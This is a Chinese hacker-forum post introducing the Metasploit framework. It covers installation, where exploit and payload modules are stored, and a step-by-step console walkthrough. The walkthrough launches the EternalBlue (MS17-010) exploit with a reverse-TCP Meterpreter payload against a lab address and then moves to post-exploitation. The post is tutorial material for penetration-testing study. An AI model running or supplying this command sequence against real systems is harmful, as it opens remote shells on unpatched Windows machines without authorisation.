[工具使用] Metasploit介绍

868 0
Honkers 2025-8-9 07:46:22 来自手机 | 显示全部楼层 |阅读模式

Metasploit的介绍

  • MetasploitFramework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新
  • Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。
  • 刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。
  • 在kali中,自带了Metasploit工具。
  1. apt-get install metasploit-framework
复制代码

MSF中exploit模块

  1. 进入框架:msfconsole
  2. 使用search命令查找相关漏洞: search ms17-010
  3. 使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue
  4. 使用info查看模块信息: info
  5. 设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
  6. 查看模块需要配置的参数:show options
  7. 设置参数:set RHOST 192.168.232.143
  8. set lhost 192.168.232.140
  9. 攻击:exploit / run
  10. 后渗透
复制代码





漏洞利用exploit

  • 也就是我们常说的 exp,他就是对漏洞进行攻击的代码。

  • exploit漏洞利用模块路径:/usr/share/metasploit-framework/modules/exploits

  • 这里面有针对不同平台的 exploit 。

  • 进入 windows 平台,这里会列出针对windows平台不同服务的漏洞利用

  • 进入smb服务,这是windows中经常爆出漏洞的服务,比如我们的永恒之蓝漏洞就在这里面。

  • 漏洞利用代码是以 rb 结尾的文件,因为metasploit是用Ruby语言编写的。

攻击载荷(payload)

  • payload模块路径:/usr/share/metasploit-framework/modules/payloads
  • Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。
  • 简而言之,这种漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。
  • Shellcode:Shellcode是payload中的精髓部分,在渗透攻击时作为攻击载荷运行的一组机器指令。
  • Shellcode通常用汇编语言编写。
  • 在大多数情况下,目标系统执行了shellcode这一组指令之后,才会提供一个命令行shell。
  1. cd /usr/share/metasploit-framework/modules/payloads
复制代码

Metasploit中的 Payload 模块


Meterpreter

摘抄

人的一生是万里山河,
来往无数过客。
有人给江河添色,
有人使日月无光,
有人改他江流,
有人塑他梁骨,
大限到时,
不过是立在山巅,
江河回望。
– 《德卡先生的信箱》

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行